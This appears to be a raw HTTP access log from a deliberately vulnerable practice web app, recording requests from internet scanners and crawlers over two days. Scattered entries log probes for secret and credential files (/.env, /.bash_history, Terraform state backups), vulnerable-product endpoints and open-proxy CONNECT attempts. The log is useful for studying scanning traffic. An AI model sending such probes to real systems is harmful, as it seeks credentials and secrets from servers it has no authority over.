Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.141.77.200:60038
Path: /
URL: /
Method: GET
[2026-03-02 13:36:54] === HTTP Request ===
===================
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate, gzip, deflate
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.42.231.241:48148
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-02 12:48:20] === HTTP Request ===
[2026-03-02 12:28:22] Main page accessed - IP: 172.30.0.12:49908
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 34.132.115.225
Via: 2.0 Caddy
Referer: http://admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:49908
Path: /
URL: /
Method: GET
[2026-03-02 12:28:22] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.137:40754
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-02 12:16:22] === HTTP Request ===
[2026-03-02 12:16:22] Main page accessed - IP: 85.142.100.137:40744
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.137:40744
Path: /
URL: /
Method: GET
[2026-03-02 12:16:22] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.10:7227
RemoteAddr: 176.65.148.2:6054
Path:
URL: //185.65.245.10:7227
Method: CONNECT
[2026-03-02 11:10:01] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.126:7256
Path: /sitemap.xml
URL: /sitemap.xml
Method: GET
[2026-03-02 11:02:44] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.126:7230
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-02 11:02:39] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.153.126:7226
Path: *
URL: *
Method: PRI
[2026-03-02 11:02:39] === HTTP Request ===
[2026-03-02 11:02:39] Main page accessed - IP: 66.132.153.126:7218
===================
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.126:7218
Path: /
URL: /
Method: GET
[2026-03-02 11:02:39] === HTTP Request ===
[2026-03-02 10:50:15] Main page accessed - IP: 34.34.132.221:54138
===================
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Connection: keep-alive
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.34.132.221:54138
Path: /
URL: /
Method: GET
[2026-03-02 10:50:15] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 204.76.203.25
Via: 1.1 Caddy
Accept-Encoding: identity
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36360
Path: /.env
URL: /.env
Method: GET
[2026-03-02 08:10:58] === HTTP Request ===
===================
Pragma: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Cache-Control: no-cache
Proxy-Connection: Keep-Alive
Headers:
Protocol: HTTP/1.1
Host: www.shadowserver.org:443
RemoteAddr: 64.62.156.152:45993
Path:
URL: //www.shadowserver.org:443
Method: CONNECT
[2026-03-02 07:46:29] === HTTP Request ===
[2026-03-02 07:46:15] Main page accessed - IP: 64.62.156.161:57761
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Headers:
Protocol: HTTP/1.1
Host: api.ipify.org
RemoteAddr: 64.62.156.161:57761
Query: format=json
Path: /
URL: http://api.ipify.org/?format=json
Method: GET
[2026-03-02 07:46:15] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.156:22349
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-02 07:45:28] === HTTP Request ===
[2026-03-02 07:44:29] Main page accessed - IP: 64.62.156.152:44546
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.152:44546
Path: /
URL: /
Method: GET
[2026-03-02 07:44:29] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:47750
Path: /jars
URL: /jars
Method: GET
[2026-03-02 07:39:38] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.6:45178
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-02 07:19:12] === HTTP Request ===
[2026-03-02 07:19:12] Main page accessed - IP: 85.217.140.6:45168
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.6:45168
Path: /
URL: /
Method: GET
[2026-03-02 07:19:12] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50023
Path: /.bash_history
URL: /.bash_history
Method: GET
[2026-03-02 06:42:53] === HTTP Request ===
[2026-03-02 06:16:54] Main page accessed - IP: 205.210.31.98:55696
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 205.210.31.98:55696
Path: /
URL: /
Method: GET
[2026-03-02 06:16:54] === HTTP Request ===
[2026-03-02 06:09:01] Main page accessed - IP: 176.65.149.45:51812
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:51812
Path: /
URL: /
Method: GET
[2026-03-02 06:09:01] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Forwarded-For: 188.166.53.180
Referer: https://admin.vulnberries.ru/
Via: 1.1 Caddy
Sec-Fetch-Site: none
Priority: u=0, i
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34702
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-02 03:39:08] === HTTP Request ===
[2026-03-02 03:39:06] Main page accessed - IP: 172.30.0.12:34702
===================
Sec-Fetch-Site: none
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0
X-Forwarded-Proto: https
X-Forwarded-For: 188.166.53.180
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-User: ?1
Priority: u=0, i
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34702
Path: /
URL: /
Method: GET
[2026-03-02 03:39:06] === HTTP Request ===
===================
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.42.231.241:58864
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-02 02:10:54] === HTTP Request ===
[2026-03-02 02:05:19] Main page accessed - IP: 139.59.170.85:42356
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 139.59.170.85:42356
Path: /
URL: /
Method: GET
[2026-03-02 02:05:19] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.154.206.71:57548
Path: /sitemap.xml
URL: /sitemap.xml
Method: GET
[2026-03-02 01:51:25] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.154.206.71:57546
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-02 01:51:25] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.154.206.71:57432
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-02 01:51:25] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.154.206.71:57348
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-02 01:51:24] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.154.206.71:57238
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-02 01:51:24] === HTTP Request ===
[2026-03-02 01:51:24] Main page accessed - IP: 165.154.206.71:57106
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 8_2_2; Win64; x64) AppleWebKit/536.48 (KHTML, like Gecko) Chrome/104.0.623 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.154.206.71:57106
Path: /
URL: /
Method: GET
[2026-03-02 01:51:24] === HTTP Request ===
[2026-03-02 01:50:45] Main page accessed - IP: 152.32.207.124:60382
===================
Accept: */*
User-Agent: curl/7.29.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 152.32.207.124:60382
Path: /
URL: /
Method: GET
[2026-03-02 01:50:45] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:59776
Path: /jars
URL: /jars
Method: GET
[2026-03-02 00:27:41] === HTTP Request ===
[2026-03-01 22:29:15] Main page accessed - IP: 205.210.31.210:61230
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 205.210.31.210:61230
Path: /
URL: /
Method: GET
[2026-03-01 22:29:15] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.138:41860
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-01 19:59:50] === HTTP Request ===
[2026-03-01 19:59:50] Main page accessed - IP: 85.142.100.138:41848
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.138:41848
Path: /
URL: /
Method: GET
[2026-03-01 19:59:50] === HTTP Request ===
[2026-03-01 17:18:39] Main page accessed - IP: 45.82.78.102:57062
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.82.78.102:57062
Path: /
URL: /
Method: GET
[2026-03-01 17:18:39] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50028
Path: /terraform.tfstate.backup
URL: /terraform.tfstate.backup
Method: GET
[2026-03-01 15:57:31] === HTTP Request ===
[2026-03-01 14:50:47] Main page accessed - IP: 172.30.0.12:58848
===================
User-Agent: Mozilla/5.0 (compatible; OpenEASM/1.0)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 37.187.134.41
Via: 1.1 Caddy
Accept-Encoding: gzip,br
Referer: http://admin.vulnberries.ru/
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:58848
Path: /
URL: /
Method: GET
[2026-03-01 14:50:47] === HTTP Request ===
[2026-03-01 14:50:47] Main page accessed - IP: 172.30.0.12:58848
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 37.187.134.41
Via: 1.1 Caddy
Accept-Encoding: gzip,br
Accept: */*
User-Agent: Mozilla/5.0 (compatible; OpenEASM/1.0)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:58848
Path: /
URL: /
Method: GET
[2026-03-01 14:50:47] === HTTP Request ===
[2026-03-01 13:18:47] Main page accessed - IP: 185.247.137.229:35475
===================
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: plausible.ch.bakunin.me:8081
RemoteAddr: 185.247.137.229:35475
Path: /
URL: /
Method: GET
[2026-03-01 13:18:47] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Accept-Encoding: gzip, br, deflate
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
From: gptbot(at)openai.com
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.241.53
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39486
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-01 11:30:26] === HTTP Request ===
[2026-03-01 11:30:25] Defects page accessed - IP: 172.30.0.12:39486
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.241.53
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
Accept-Encoding: gzip, br, deflate
Accept: */*
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
From: gptbot(at)openai.com
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39486
Path: /defects
URL: /defects
Method: GET
[2026-03-01 11:30:25] === HTTP Request ===
===================
Accept-Encoding: gzip, br, deflate
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.241.53
Via: 2.0 Caddy
From: gptbot(at)openai.com
Referer: https://admin.vulnberries.ru/
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39486
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-01 11:30:23] === HTTP Request ===
[2026-03-01 11:30:22] Login page accessed - IP: 172.30.0.12:39486
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.241.53
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
From: gptbot(at)openai.com
Accept: */*
Accept-Encoding: gzip, br, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39486
Path: /login
URL: /login
Method: GET
[2026-03-01 11:30:22] === HTTP Request ===
[2026-03-01 11:30:19] Logs page accessed - IP: 172.30.0.12:39486
===================
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.241.53
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39486
Path: /logs
URL: /logs
Method: GET
[2026-03-01 11:30:19] === HTTP Request ===
[2026-03-01 11:30:18] Cabinet page accessed - user_id: , IP: 172.30.0.12:39486
===================
X-Forwarded-Proto: https
Accept-Encoding: gzip, br, deflate
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
From: gptbot(at)openai.com
X-Openai-Host-Hash: 867116608
X-Forwarded-For: 74.7.241.53
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39486
Path: /cabinet
URL: /cabinet
Method: GET
[2026-03-01 11:30:18] === HTTP Request ===
[2026-03-01 11:30:16] Salary page accessed - IP: 172.30.0.12:39486
===================
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
Accept-Encoding: gzip, br, deflate
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.241.53
From: gptbot(at)openai.com
X-Openai-Host-Hash: 867116608
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39486
Path: /salary
URL: /salary
Method: GET
[2026-03-01 11:30:16] === HTTP Request ===
===================
X-Forwarded-Proto: https
Via: 2.0 Caddy
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
Accept-Encoding: gzip, br, deflate
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.241.53
Referer: https://admin.vulnberries.ru/
From: gptbot(at)openai.com
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39486
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-01 11:30:13] === HTTP Request ===
[2026-03-01 11:30:11] Goods page accessed - IP: 172.30.0.12:39486
===================
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Proto: https
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
Accept-Encoding: gzip, br, deflate
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.241.53
From: gptbot(at)openai.com
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39486
Path: /goods
URL: /goods
Method: GET
[2026-03-01 11:30:11] === HTTP Request ===
[2026-03-01 11:30:09] Main page accessed - IP: 172.30.0.12:39486
===================
X-Openai-Host-Hash: 867116608
From: gptbot(at)openai.com
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.241.53
Via: 2.0 Caddy
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39486
Path: /
URL: /
Method: GET
[2026-03-01 11:30:09] === HTTP Request ===
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-For: 74.7.244.23
From: oai-searchbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
Via: 2.0 Caddy
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39486
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-01 11:30:07] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 147.185.132.141:60980
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-01 11:28:04] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: inventory.vulnberries.ru
RemoteAddr: 205.210.31.228:64770
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-01 11:27:25] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru
RemoteAddr: 198.235.24.111:64504
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-01 11:10:30] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru
RemoteAddr: 198.235.24.99:59028
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-01 10:49:11] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +``https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.134:39560
Query: next=%2Fadmin%2F
Path: /DDoS01/9c5f92eb/admin/login
URL: /DDoS01/9c5f92eb/admin/login?next=%2Fadmin%2F
Method: GET
[2026-03-01 10:34:10] === HTTP Request ===
[2026-03-01 10:28:27] Main page accessed - IP: 207.90.244.26:46734
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.26:46734
Path: /
URL: /
Method: GET
[2026-03-01 10:28:27] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 198.235.24.122:64156
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-01 10:12:16] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: defect.vulnberries.ru
RemoteAddr: 205.210.31.235:58962
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-01 10:00:15] === HTTP Request ===
[2026-03-01 09:52:46] Main page accessed - IP: 162.142.125.121:64900
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.121:64900
Path: /
URL: /
Method: GET
[2026-03-01 09:52:46] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.140:7227
RemoteAddr: 176.65.134.3:7462
Path:
URL: //185.65.245.140:7227
Method: CONNECT
[2026-03-01 09:34:19] === HTTP Request ===
===================
Sec-Ch-Ua-Mobile: ?0
Referer: http://95.143.191.38:8081/
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua: "Chromium";v="142", "Not:A-Brand";v="24", "Brave";v="142"
Connection: keep-alive
Sec-Gpc: 1
Sec-Fetch-Site: none
Sec-Ch-Ua-Platform: "Linux"
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: document
Sec-Fetch-User: ?1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 68.183.20.198:34080
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-01 08:17:02] === HTTP Request ===
[2026-03-01 08:17:02] Main page accessed - IP: 68.183.20.198:34066
===================
Sec-Gpc: 1
Sec-Ch-Ua: "Chromium";v="142", "Not:A-Brand";v="24", "Brave";v="142"
Sec-Fetch-User: ?1
Sec-Fetch-Mode: navigate
Sec-Ch-Ua-Mobile: ?0
Connection: keep-alive
